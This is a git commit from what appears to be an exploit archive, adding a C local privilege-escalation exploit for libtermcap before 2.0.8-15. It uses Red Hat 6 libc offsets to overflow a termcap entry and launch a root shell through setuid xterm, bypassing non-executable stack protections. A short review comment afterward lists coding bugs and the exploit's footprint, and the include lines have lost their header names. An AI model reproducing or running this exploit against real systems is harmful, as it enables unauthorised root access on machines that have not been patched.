From 5d3573ef7a109ee70416fe94db098fe6a769a798 Mon Sep 17 00:00:00 2001
From: SkyperTHC
Date: Tue, 3 Mar 2026 06:28:55 +0000
Subject: packetstorm sync
---
exploits/7350termcap/libtermcapsploit.c | 61 +++++++++++++++++++++++++++++++++
1 file changed, 61 insertions(+)
create mode 100644 exploits/7350termcap/libtermcapsploit.c
(limited to 'exploits/7350termcap/libtermcapsploit.c')
diff --git a/exploits/7350termcap/libtermcapsploit.c b/exploits/7350termcap/libtermcapsploit.c
new file mode 100644
index 0000000..893ca0e
--- /dev/null
+++ b/exploits/7350termcap/libtermcapsploit.c
@@ -0,0 +1,61 @@
+#include
+#include
+#include
+#include
+#include
+
+// yet another lame libtermcap<2.0.8-15 sploit by typo@scene.at (libc jumpback)
+// only made this to bypass nonexecutable stack patches - http://teso.scene.at/
+
+// Redhat 6 offsets (i only needed these)
+int sys = 0x401bca40; // system
+int sh = 0x4025ab12; // /bin/sh
+int exi = 0x4020b910; // _exit
+int ran = 0x401b9928; // random offset in libc
+int eip = 2136;
+#define fil "/tmp/teso_termcap"
+#define xte "/usr/X11R6/bin/xterm"
+#define entry "xterm|"
+
+int main(int argc, char **argv) {
+ char *buf;
+ int fd, buflen;
+
+ argv++;
+
+ if (argc>1) // dec,!hex args
+ sys = atoi(*(argv++));
+ if (argc>2)
+ sh = atoi(*(argv++));
+ if (argc>3)
+ exi = atoi(*(argv++));
+ if (argc>4)
+ eip = atoi(*(argv++));
+
+ buflen = eip + 20;
+
+ buf = (char *) malloc(buflen);
+ memset(buf, 'x', buflen);
+ buf[buflen] = 0;
+
+ memcpy(buf, entry, strlen(entry));
+ memcpy (buf+buflen-4,":\\y",3);
+
+ memcpy(buf+eip,&sys,4);
+ memcpy(buf+eip+4,&exi,4);
+ memcpy(buf+eip+8,&sh,4);
+ memcpy(buf+eip+12,&ran,4);
+
+ if ( (fd = open(fil, O_WRONLY|O_CREAT|O_TRUNC, "644"))<0) {
+ perror("cannot create file");
+ exit(EXIT_FAILURE);
+ }
+
+ write(fd,buf,buflen);
+ close(fd);
+ free(buf);
+
+ setenv("TERMCAP", fil, 1);
+ execl(xte, "xterm", NULL);
+ exit(EXIT_SUCCESS);
+}
--
cgit v1.3
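Review bot: `open(fil, O_WRONLY|O_CREAT|O_TRUNC, "644")` passes a string literal where `open()` takes an integer `mode_t`, so the pointer value is what ends up used as the permission mode; the octal constant `0644` is presumably what was meant. `buf[buflen] = 0` also writes one byte past the `malloc(buflen)` region, and the `write()` and `execl()` results are never checked. The five `#include` lines carry no header names, which looks like the angle-bracketed names were lost when the page was rendered rather than an omission in the committed file. For anyone cataloguing this archive entry, the footprint the code fixes in its own defines is a termcap file at `/tmp/teso_termcap` with `TERMCAP` pointed at it before exec of `/usr/X11R6/bin/xterm`, and the header comment names the affected range as `libtermcap<2.0.8-15`.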